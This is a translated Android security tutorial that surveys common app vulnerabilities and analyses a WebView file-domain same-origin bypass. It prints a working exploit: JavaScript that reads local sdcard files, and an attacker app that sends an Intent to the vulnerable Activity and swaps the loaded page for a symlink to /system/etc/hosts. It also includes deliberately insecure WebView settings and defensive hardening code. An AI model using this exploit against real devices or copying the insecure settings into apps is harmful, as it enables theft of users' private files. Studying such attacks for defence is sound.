2025-01-18 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
WebView file-domain same-origin policy bypass vulnerability: example analysis. Many beginners are not clear about this, so the editor explains it in detail below for anyone who needs it; I hope you gain something from it.
Basic knowledge: Android architecture
  Kernel layer
    Vulnerabilities here are extremely harmful and widely applicable.
    Because there are many and varied drivers, there may be many vulnerabilities.
  Libraries (system runtime layer)
    The runtime is provided in the form of system middleware
    Includes libc, WebKit, SQLite, etc.
  Android Runtime
    Dalvik virtual machine and core libraries
  Framework (application framework layer)
    Provides a range of services and interfaces as APIs
    Activity Manager
    Content Provider
    View
    Resource Manager
    Notification Manager
  Application layer
    System applications
    Other applications
    Programs implemented by developers using the APIs of the application framework layer
Common Android components
  Activity
  Service
  BroadcastReceiver
  ContentProvider
Common Android app vulnerabilities (OWASP Mobile Top 10)
  Improper platform usage
    Overview
      Abuse of platform functions, or failure to use the platform's security controls, such as misuse of Intents or misuse of permissions.
    Risk
      Extensive; it may involve any of the services on the mobile platform.
    Examples
      On iOS, password data is stored in a local file rather than in the keychain, so it can be read from a pseudo-encrypted backup.
      On Android, improper use of Intents lets a malicious user hijack and modify the contents of an intent and perform arbitrary actions with the privileges of the original process.
  Insecure data storage
  Insecure communication
Typical vulnerabilities and mining methods
  Data storage vulnerabilities
    Data files or directories
      Plaintext storage
      MODE_PRIVATE was not used when creating the database
      MODE_PRIVATE was not used when creating the configuration file, so other programs can read it
      Plaintext storage; a root user can read it, leading to sensitive data disclosure
    SharedPreferences
      /data/data/<package name>/shared_prefs/*.xml
    SQLiteDatabases
      /data/data/<package name>/databases/*.db
    InternalStorage
      /data/data/<package name>/files/*
    ExternalStorage
      /mnt/sdcard/*
    Detection method
      Browse the files and directories under /data/data/<package name> and check whether any file is readable by the "other" user class
      Check whether plaintext sensitive information exists in configuration files, databases, etc.
    Mining method
      Code inspection
        Check whether the mode parameter of openFileOutput, getSharedPreferences, openOrCreateDatabase and similar functions is MODE_PRIVATE (0x0000)
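The detection and mining methods above can be turned into a self-check that an app (or a tester with a debug build) runs on its own private directory. The following is an added example, not code from the article: it walks the app's data directory and reports every entry whose mode bits let the "other" class read or write it, and shows the creation calls with MODE_PRIVATE that the code inspection step expects to find. The file names ("session.bin", "config", "cache.db") are constructed for the example.

```java
import android.content.Context;
import android.system.ErrnoException;
import android.system.Os;
import android.system.OsConstants;
import android.system.StructStat;
import android.text.TextUtils;

import java.io.File;
import java.util.ArrayList;
import java.util.List;

/** Added example: audits the app's private data directory for world-accessible files. */
public final class PrivateDirAudit {

    private PrivateDirAudit() {}

    /** Returns the paths under root that are readable or writable by "others" (other uids). */
    public static List<String> findWorldAccessible(File root) {
        List<String> hits = new ArrayList<>();
        walk(root, hits);
        return hits;
    }

    private static void walk(File f, List<String> hits) {
        try {
            // lstat, not stat: examine the entry itself, so a symlink is not resolved to its target
            StructStat st = Os.lstat(f.getAbsolutePath());
            if ((st.st_mode & (OsConstants.S_IROTH | OsConstants.S_IWOTH)) != 0) {
                hits.add(f.getAbsolutePath());
            }
        } catch (ErrnoException e) {
            hits.add(f.getAbsolutePath() + " (lstat failed: " + e.getMessage() + ")");
        }
        File[] children = f.listFiles();
        if (children == null) return;          // not a directory, or not listable
        for (File c : children) walk(c, hits);
    }

    /**
     * The creation calls the code inspection step looks for, with the correct mode.
     * MODE_PRIVATE (0) creates the file under the app's own uid with no "other" bits.
     * MODE_WORLD_READABLE / MODE_WORLD_WRITEABLE are the findings; they are deprecated
     * and throw SecurityException for apps targeting Android 7.0 or later.
     */
    public static void createPrivately(Context ctx) throws java.io.IOException {
        ctx.openFileOutput("session.bin", Context.MODE_PRIVATE).close();
        ctx.getSharedPreferences("config", Context.MODE_PRIVATE).edit().clear().apply();
        ctx.openOrCreateDatabase("cache.db", Context.MODE_PRIVATE, null).close();
    }

    /** One-line report suitable for a debug-only menu entry or an instrumentation test. */
    public static String report(Context ctx) {
        List<String> hits = findWorldAccessible(new File(ctx.getApplicationInfo().dataDir));
        return hits.isEmpty() ? "no world-accessible files" : TextUtils.join("\n", hits);
    }
}
```

A hit on a file created by the app itself usually means one of the three creation calls above was given a world-readable mode or the file was later chmod'ed; a hit on the directory itself is worse, because it lets other apps list the names. The check does not cover the root-user case from the outline: plaintext content that root can read is only addressed by encrypting the data, not by mode bits.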
  Data communication vulnerabilities
    Plaintext protocols such as HTTP are used to transmit sensitive information to the server
      Plaintext traffic is captured through LAN sniffing, malicious public Wi-Fi, malicious proxy services, DNS hijacking and so on, resulting in man-in-the-middle attacks.
    Weak SSL certificate validation
      Mining method
        Search for .method public checkServerTrusted
        Locate the .method and .end method lines
        Check whether the body consists only of return-void
        Similarly, check whether verify(String, SSLSession) always returns true and whether the X509HostnameVerifier parameter is ALLOW_ALL_HOSTNAME_VERIFIER.
      Attack method
        Open the Fiddler proxy and allow remote hosts to connect to it
    Missing SSL certificate validation in the app
      The client should implement the X509TrustManager class, including the three methods checkServerTrusted, checkClientTrusted and getAcceptedIssuers
      A failed certificate check raises an exception, which the application then handles
      Failing to validate the server certificate can lead to TLS man-in-the-middle attacks
      Or, when setting the HostnameVerifier of HttpsURLConnection, it is set to ALLOW_ALL_HOSTNAME_VERIFIER so that all domain names are accepted.
    Strong SSL certificate validation
      May be bypassed with Xposed, patching, etc.
  Component exposure vulnerabilities
    If a component declares an intent-filter, android:exported defaults to true; otherwise it defaults to false.
    Permission control of exported components
      Authentication bypass
        After an Activity is exposed it can be called by a third party, and may allow logging in or resetting the password without a password
      Sensitive information disclosure
        After a Receiver is exposed it can be started by a third party, and sensitive information such as debug output may be viewed.
      Unauthorised actions
        A low-privilege program performs high-privilege actions by calling components exposed by a high-privilege program.
    Mining method
      Inspect AndroidManifest.xml
      Security assessment with drozer's attacksurface module
  Weak encryption vulnerabilities
    Hard-coded passwords
      Can be obtained by decompilation, by viewing as root, etc.
    Weak AES/DES usage
      ECB mode is vulnerable to analysis or replay attacks.
  WebView
    Mainly three kinds of vulnerabilities:
    Arbitrary code execution
      Write a web page that traverses the injected object; if a getClass method is reachable, there is a remote code execution vulnerability.
      With a Fiddler "before" script, the test can be injected into any page that any WebView visits.
      Since Android 4.2, only methods annotated with @JavascriptInterface on the object passed to addJavascriptInterface can be called from JavaScript in the page; if their input is not filtered, vulnerabilities may still exist.
    Domain control is not strict
      setAllowFileAccess
      setAllowFileAccessFromFileURLs
      setAllowUniversalAccessFromFileURLs (lets sensitive information be disclosed remotely)
      Local files can be accessed through a symbolic-link attack: JavaScript in a file:// page can read its own file no matter how access is restricted, so if the page delays execution and the file it was loaded from is meanwhile replaced by a symbolic link to another file, the file the link points to is what gets read.
      If the WebView enables JavaScript and does not restrict file:/// URLs, sensitive information such as cookies, private files and databases can be disclosed.
    Plaintext password storage
      When the user chooses to save the username and password entered in the WebView, they are saved in plaintext to data.db in the app directory
      An attacker with root privileges can read it
Summary of the vulnerability mining process
  Static analysis
    Rapid detection to obtain the key targets for analysis
    Check the AndroidManifest file
    Parse the Smali code with scripts
  Dynamic analysis
    Verification and impact assessment of suspected risks
    Debug-mode analysis
    Attempted exploitation / vulnerability verification
      drozer
    Packet capture to analyse data and interfaces
  Reverse analysis
    Crack the encryption and further analyse the logic and code
  Automated assistance systems
    MobSF, includes a front-end web interface
    Marvin, includes a front-end web interface, so deployment is more troublesome
    Inspeckage, an Xposed plug-in
Today we're going to talk about the vulnerabilities of WebView.
Example code address: https://github.com/jltxgcy/AppVulnerability/tree/master/WebViewFileDemo.
Or my github: https://github.com/MaxSecret/AppVulnerability/tree/master/WebViewFileDemo1.
The main difference in the code below is that this time attack_file.html is loaded:
import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import android.webkit.JsResult;
import android.webkit.WebChromeClient;
import android.webkit.WebView;
import android.widget.Toast;

public class MainActivity extends Activity {
    private WebView webView;
    private Uri mUri;
    private String url;
    String mUrl1 = "file:///android_asset/html/attack_file.html";
    // String mUrl2 = "file:///android_asset/html/test.html";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        webView = (WebView) findViewById(R.id.webview);
        webView.getSettings().setJavaScriptEnabled(true);
        webView.addJavascriptInterface(new JSInterface(), "jsInterface");
        // The setting this demo is about: JavaScript in a file:// page may read other local files
        webView.getSettings().setAllowFileAccessFromFileURLs(true);
        webView.setWebChromeClient(new WebChromeClient() {
            @Override
            public boolean onJsAlert(WebView view, String url, String message, JsResult result) {
                // Required functionality here
                return super.onJsAlert(view, url, message, result);
            }
        });
        webView.loadUrl(mUrl1);
    }

    // Exposed to the page as window.jsInterface. On API 17+ only methods annotated
    // @JavascriptInterface are reachable from JavaScript; this demo targets older levels.
    class JSInterface {
        public String onButtonClick(String text) {
            final String str = text;
            runOnUiThread(new Runnable() {
                @Override
                public void run() {
                    Log.e("leehong2", "onButtonClick: text = " + str);
                    Toast.makeText(getApplicationContext(), "onButtonClick: text = " + str, Toast.LENGTH_LONG).show();
                }
            });
            return "This text is returned from Java layer. Js text = " + text;
        }

        public void onImageClick(String url, int width, int height) {
            final String str = "onImageClick: text = " + url + " width = " + width + " height = " + height;
            Log.i("leehong2", str);
            runOnUiThread(new Runnable() {
                @Override
                public void run() {
                    Toast.makeText(getApplicationContext(), str, Toast.LENGTH_LONG).show();
                }
            });
        }
    }
}
Here webView.getSettings().setAllowFileAccessFromFileURLs(true) means that JavaScript running in a file:// page can access other local files. Now let's look at the attack_file.html code:
function stealFile() {
    var file = "file:///mnt/sdcard/233.txt";
    var xmlHttpReq = new XMLHttpRequest();
    xmlHttpReq.onreadystatechange = function () {
        if (xmlHttpReq.readyState == 4) {
            // Reached DONE: show whatever the local file contained
            alert(xmlHttpReq.responseText);
        }
    };
    xmlHttpReq.open("GET", file);
    xmlHttpReq.send(null);
}
stealFile();
Because setAllowFileAccessFromFileURLs is true, the HTML loaded by webView.loadUrl can return the contents of /mnt/sdcard/2333.txt.
If setAllowFileAccessFromFileURLs is false, the HTML loaded by webView.loadUrl cannot return the contents of /mnt/sdcard/2333.txt.
Even if setAllowFileAccessFromFileURLs is false, there is one way to get past this limit, which is discussed next.
First run WebViewFileDemo1, then run AttackWebView to attack its WebView.
Let's first take a look at WebViewFileDemo1. The main code is as follows:
package com.example.webviewfiledemo;

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import android.webkit.JsResult;
import android.webkit.WebChromeClient;
import android.webkit.WebView;
import android.widget.Toast;

public class MainActivity extends Activity {
    private WebView webView;
    private Uri mUri;
    private String url;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        webView = (WebView) findViewById(R.id.webview);
        webView.getSettings().setJavaScriptEnabled(true);
        // JSInterface is the same inner class as in the previous listing
        webView.addJavascriptInterface(new JSInterface(), "jsInterface");
        // This time the file-domain switch is off, which is what the symlink trick bypasses
        webView.getSettings().setAllowFileAccessFromFileURLs(false);
        // webView.getSettings().setAllowFileAccess(false);
        webView.setWebChromeClient(new WebChromeClient() {
            @Override
            public boolean onJsAlert(WebView view, String url, String message, JsResult result) {
                // Required functionality here
                return super.onJsAlert(view, url, message, result);
            }
        });
        // The URL to load is taken, unchecked, from whatever Intent started this Activity
        Intent i = getIntent();
        if (i != null) {
            mUri = i.getData();
        }
        if (mUri != null) {
            url = mUri.toString();
        }
        if (url != null) {
            webView.loadUrl(url);
        }
    }
}
This Activity receives an Intent from outside, extracts the URL from it and loads it.
Now let's look at the AttackWebView project, which is the project that sends the Intent to com.example.webviewfiledemo.MainActivity. The code is as follows:
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class MainActivity extends Activity {
    // A page that, 8 seconds after loading, fetches its own URL (d.URL) and displays the result
    public final static String HTML =
            "<html><body>" +
            "Wait a few seconds." +
            "<script>" +
            "var d = document;" +
            "function doitjs() {" +
            "var xhr = new XMLHttpRequest;" +
            "xhr.onload = function() {" +
            "var txt = xhr.responseText;" +
            "d.body.appendChild(d.createTextNode(txt));" +
            "alert(txt);" + "};" +
            "xhr.open('GET', d.URL);" +
            "xhr.send(null);" +
            "}" +
            "setTimeout(doitjs, 8000);" +
            "</script>" +
            "</body></html>";

    public static String MY_TMP_DIR;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        MY_TMP_DIR = getDir("payload_odex", MODE_PRIVATE).getAbsolutePath();
        doit();
    }

    public void doit() {
        String HTML_PATH = MY_TMP_DIR + "/A0" + ".html";
        try {
            cmdexec("mkdir " + MY_TMP_DIR);
            cmdexec("echo \"" + HTML + "\" > " + HTML_PATH);
            cmdexec("chmod -R 777 " + MY_TMP_DIR);   // so the target app's uid can read the page
            Thread.sleep(1000);
            invokeVulnAPP("file://" + HTML_PATH);   // target loads A0.html; its 8-second timer starts
            Thread.sleep(6000);
            cmdexec("rm " + HTML_PATH);              // swap the page for a symlink before the timer fires
            cmdexec("ln -s " + "/system/etc/hosts " + HTML_PATH);
        } catch (Exception e) {
            // TODO: handle exception
        }
    }

    public void invokeVulnAPP(String url) {
        try {
            Intent intent = new Intent(Intent.ACTION_MAIN, Uri.parse(url));
            intent.addCategory(Intent.CATEGORY_LAUNCHER);
            intent.setClassName("com.example.webviewfiledemo", "com.example.webviewfiledemo.MainActivity");
            startActivity(intent);
        } catch (Exception e) {
            // TODO: handle exception
        }
    }

    public void cmdexec(String cmd) {
        try {
            String[] tmp = new String[] {"/system/bin/sh", "-c", cmd};
            Runtime.getRuntime().exec(tmp);
        } catch (Exception e) {
            // TODO: handle exception
        }
    }
}
Through invokeVulnAPP, com.example.webviewfiledemo.MainActivity is opened and the Intent is passed to it. The Activity extracts the URL, which is /sdcard/payload_odex/A0.html, and the WebView loads that HTML, whose content is as follows:
public final static String HTML =
        "<html><body>" +
        "Wait a few seconds." +
        "<script>" +
        "var d = document;" +
        "function doitjs() {" +
        "var xhr = new XMLHttpRequest;" +
        "xhr.onload = function() {" +
        "var txt = xhr.responseText;" +
        "d.body.appendChild(d.createTextNode(txt));" +
        "alert(txt);" + "};" +
        "xhr.open('GET', d.URL);" +
        "xhr.send(null);" +
        "}" +
        "setTimeout(doitjs, 8000);" +
        "</script>" +
        "</body></html>";
When the WebView in the WebViewFileDemo1 project loads A0.html, what this HTML does is wait 8 seconds and then read A0.html itself (d.URL is the page's own file:// URL). Now go back to the AttackWebView project and look at the code:
cmdexec("mkdir " + MY_TMP_DIR);
cmdexec("echo \"" + HTML + "\" > " + HTML_PATH);
cmdexec("chmod -R 777 " + MY_TMP_DIR);
Thread.sleep(1000);
invokeVulnAPP("file://" + HTML_PATH);
Thread.sleep(6000);
cmdexec("rm " + HTML_PATH);
cmdexec("ln -s " + "/system/etc/hosts " + HTML_PATH);
After invokeVulnAPP is called, six seconds later A0.html is first deleted and then replaced by a symbolic link to /system/etc/hosts. Recall that the HTML loaded by the WebView in WebViewFileDemo1 delays reading A0.html itself by 8 seconds: a file:// page is always allowed to read its own URL, so the check that setAllowFileAccessFromFileURLs(false) enforces is passed, but by the time the read happens the path is a symlink and what comes back is the content of /system/etc/hosts.
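The fix for the Activity in WebViewFileDemo1, and for the symlink timing trick just described, is to stop loading attacker-supplied file:// URLs at all rather than to rely on the file-domain switches alone. The following is an added example, not code from the article or from the WebViewFileDemo/AttackWebView projects: a hardened version of that Activity. It assumes the same R.layout.activity_main and R.id.webview resources as the demo; the ALLOWED_HOSTS values are placeholders, and the two-argument shouldOverrideUrlLoading override is the API 24+ form.

```java
package com.example.webviewfiledemo;   // same package as the demo, assumed for the example

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebResourceRequest;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;

import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

/** Added example: the demo Activity with the file-domain switches closed and an allowlist on the Intent URL. */
public class SafeWebViewActivity extends Activity {

    // Placeholder allowlist: only https pages on these hosts may be opened from an external Intent.
    private static final Set<String> ALLOWED_HOSTS =
            new HashSet<>(Arrays.asList("example.com", "www.example.com"));

    private WebView webView;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        webView = (WebView) findViewById(R.id.webview);

        WebSettings s = webView.getSettings();
        s.setJavaScriptEnabled(true);
        // The three settings from the "domain control is not strict" list, all off,
        // plus content:// access, which is another local-data origin.
        s.setAllowFileAccess(false);
        s.setAllowFileAccessFromFileURLs(false);
        s.setAllowUniversalAccessFromFileURLs(false);
        s.setAllowContentAccess(false);

        // Redirects and in-page navigations are held to the same allowlist as the initial load.
        webView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
                return !isAllowed(request.getUrl());   // returning true cancels the navigation
            }
        });

        Intent i = getIntent();
        Uri uri = (i != null) ? i.getData() : null;
        if (isAllowed(uri)) {
            webView.loadUrl(uri.toString());
        } else {
            // Never fall back to loading the untrusted value; a file:// URL from another app is dropped here.
            webView.loadUrl("about:blank");
        }
    }

    /**
     * Only https to an allowlisted host passes. This rejects file://, content://, javascript:
     * and any host not in the list, so no externally chosen local path is ever loaded.
     */
    static boolean isAllowed(Uri uri) {
        if (uri == null || uri.getScheme() == null || uri.getHost() == null) return false;
        return "https".equalsIgnoreCase(uri.getScheme())
                && ALLOWED_HOSTS.contains(uri.getHost().toLowerCase(Locale.ROOT));
    }
}
```

With isAllowed in place, the Intent that AttackWebView sends (a file:// URL under its own directory) is rejected before anything is loaded, so there is no file:// page whose 8-second timer and later symlink swap could be used. Closing setAllowFileAccess also means the app's own asset pages cannot reach arbitrary local paths. If the Activity does not need to be started by other apps at all, the component-exposure item from the outline applies as well: set android:exported="false" on it in AndroidManifest.xml, which removes the entry point that invokeVulnAPP relies on.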